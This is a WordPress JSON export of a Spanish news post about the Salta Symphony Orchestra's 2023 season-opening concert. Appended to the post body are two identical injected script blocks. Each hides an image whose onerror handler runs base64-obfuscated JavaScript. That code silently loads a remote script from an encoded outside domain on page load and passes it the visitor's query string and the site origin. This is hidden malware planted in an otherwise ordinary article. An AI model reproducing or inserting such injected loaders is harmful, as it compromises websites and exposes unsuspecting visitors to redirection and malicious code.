{"id":2369,"date":"2023-03-20T20:19:26","date_gmt":"2023-03-20T23:19:26","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2369"},"modified":"2025-08-14T00:20:57","modified_gmt":"2025-08-14T03:20:57","slug":"la-sinfonica-de-salta-ratifico-su-compromiso-con-el-publico-salteno-en-un-magistral-concierto-de-apertura-de-temporada","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2369","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-sinfonica-de-salta-ratifico-su-compromiso-con-el-publico-saltenio-en-un-magistral-concierto-de-apertura-de-temporada-88555\">La Sinf\u00f3nica de Salta ratific\u00f3 su compromiso con el p\u00fablico salte\u00f1o en un magistral concierto de apertura de temporada<\/a>"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#68063f\"><em>Bajo la batuta del Mtro. Gonzalo Hidalgo, m\u00e1s de mil personas disfrutaron de la presentaci\u00f3n que brind\u00f3 la agrupaci\u00f3n orquestal en el Teatro Provincial<\/em><\/h3>\n\n\n\n<p>Anoche, la Orquesta Sinf\u00f3nica de Salta ofreci\u00f3 el primer concierto de su temporada art\u00edstica 2023, bajo la direcci\u00f3n de su flamante director titular, el Maestro&nbsp;<strong>Gonzalo Hidalgo<\/strong>. Ante un auditorio colmado de p\u00fablico expectante, la sinf\u00f3nica revalid\u00f3 su compromiso social con el p\u00fablico salte\u00f1o y ratific\u00f3 su nivel de excelencia mediante la interpretaci\u00f3n de obras elegidas especialmente para la ocasi\u00f3n.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6234-la-sinfonica-de-salta-ratifico-su-compromiso-con-el-publico-saltenio-en-un-magistral-concierto-de-apertura-de-temporada.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6234-la-sinfonica-de-salta-ratifico-su-compromiso-con-el-publico-saltenio-en-un-magistral-concierto-de-apertura-de-temporada.jpg\" alt=\"La Sinf\u00f3nica de Salta ratific\u00f3 su compromiso con el p\u00fablico salte\u00f1o en un magistral concierto de apertura de temporada\" width=\"-410\" height=\"-273\"\/><\/a><\/figure><\/div>\n\n\n<p>Durante la apertura, el secretario de Cultura,<strong>&nbsp;Diego Ashur Mas<\/strong>, dio la bienvenida al nuevo director, &nbsp;y &nbsp;manifest\u00f3 que \u201cEstamos ante una nueva era de la agrupaci\u00f3n. El a\u00f1o pasado se llev\u00f3 adelante el concurso p\u00fablico, abierto, e internacional para el cargo de director titular, organizado por el Gobierno de la Provincia, mediante el Instituto de M\u00fasica y Danza dependiente de la Secretar\u00eda de Cultura, y hoy nos encontramos en esta instancia de un nuevo comienzo pero con el mismo compromiso con los salte\u00f1os\u201d. Asimismo, adelant\u00f3 que para este a\u00f1o continuar\u00e1n las giras por el interior provincial, para que la agrupaci\u00f3n visite diferentes localidades y lleve su m\u00fasica a m\u00e1s familias salte\u00f1as.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6235-la-sinfonica-de-salta-ratifico-su-compromiso-con-el-publico-saltenio-en-un-magistral-concierto-de-apertura-de-temporada.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6235-la-sinfonica-de-salta-ratifico-su-compromiso-con-el-publico-saltenio-en-un-magistral-concierto-de-apertura-de-temporada.jpg\" alt=\"La Sinf\u00f3nica de Salta ratific\u00f3 su compromiso con el p\u00fablico salte\u00f1o en un magistral concierto de apertura de temporada\" width=\"-355\" height=\"-236\"\/><\/a><\/figure><\/div>\n\n\n<p>Con una s\u00f3lida impronta, el director Titular&nbsp;<strong>Gonzalo Hidalgo<\/strong>, se luci\u00f3 con su en su primera presentaci\u00f3n, y afirm\u00f3 que renovados repertorios y el acercamiento al p\u00fablico ser\u00e1n dos de los pilares fundamentales en esta nueva etapa; e inst\u00f3 a los presentes a transitar junto a la orquesta los conciertos que se ofrecer\u00e1n de ahora en adelante.<\/p>\n\n\n\n<p>Asistieron a la velada la Directora del Instituto de M\u00fasica y Danza, Lic. Roxana Celeste Dib y la Coordinadora de la Secretar\u00eda de Cultura, Mar\u00eda Jos\u00e9 Fascio.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6236-la-sinfonica-de-salta-ratifico-su-compromiso-con-el-publico-saltenio-en-un-magistral-concierto-de-apertura-de-temporada.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6236-la-sinfonica-de-salta-ratifico-su-compromiso-con-el-publico-saltenio-en-un-magistral-concierto-de-apertura-de-temporada.jpg\" alt=\"La Sinf\u00f3nica de Salta ratific\u00f3 su compromiso con el p\u00fablico salte\u00f1o en un magistral concierto de apertura de temporada\" width=\"-402\" height=\"-268\"\/><\/a><\/figure><\/div>\n\n\n<p>El programa estuvo integrado por la Sinfon\u00eda Nro. 9, Op. 95, \u201cdel Nuevo Mundo\u201d de Anton\u00edn Dvorak, Rhapsody in blue de Georges Gershwin con la impecable participaci\u00f3n de Fernanda Morello como solista en piano, y la Obertura 1812 de Piotr I. Tchaikovsky. En el final, la orquesta brill\u00f3 con la imponente interpretaci\u00f3n de Bacanal, de Samson y Dalila de Camille Saint Sa\u00ebnz, momento en que fue aplaudida de pie por los presentes.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6237-la-sinfonica-de-salta-ratifico-su-compromiso-con-el-publico-saltenio-en-un-magistral-concierto-de-apertura-de-temporada.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6237-la-sinfonica-de-salta-ratifico-su-compromiso-con-el-publico-saltenio-en-un-magistral-concierto-de-apertura-de-temporada.jpg\" alt=\"La Sinf\u00f3nica de Salta ratific\u00f3 su compromiso con el p\u00fablico salte\u00f1o en un magistral concierto de apertura de temporada\" width=\"320\" height=\"213\"\/><\/a><\/figure><\/div>\n\n\n<p>La pr\u00f3xima presentaci\u00f3n se realizar\u00e1 el jueves 23 de marzo a las 21 en la Catedral Bas\u00edlica para celebrar los 60 a\u00f1os de la Universidad Cat\u00f3lica de Salta. Dirigida por el Mtro. Jorge Lhez, se interpretar\u00e1 Jubilate Deo de Dan Forrest con coro y solistas invitados. Entrada libre y gratuita, por orden de llegada.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"La Sinf\u00f3nica ratific\u00f3 su compromiso con el p\u00fablico salte\u00f1o en un magistral concierto de apertura\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/g1fHjPDVor0?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-sinfonica-de-salta-ratifico-su-compromiso-con-el-publico-saltenio-en-un-magistral-concierto-de-apertura-de-temporada-88555\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Bajo la batuta del Mtro. Gonzalo Hidalgo, m\u00e1s de mil personas disfrutaron de la presentaci\u00f3n que brind\u00f3 la agrupaci\u00f3n orquestal en el Teatro Provincial Anoche, la Orquesta Sinf\u00f3nica de Salta ofreci\u00f3 el primer concierto de su temporada art\u00edstica 2023, bajo la direcci\u00f3n de su flamante director titular, el Maestro&nbsp;Gonzalo Hidalgo. Ante un auditorio colmado de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2370,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2369","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2369"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2369"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2369\/revisions"}],"predecessor-version":[{"id":7142,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2369\/revisions\/7142"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2370"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2369"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2369"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2369"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}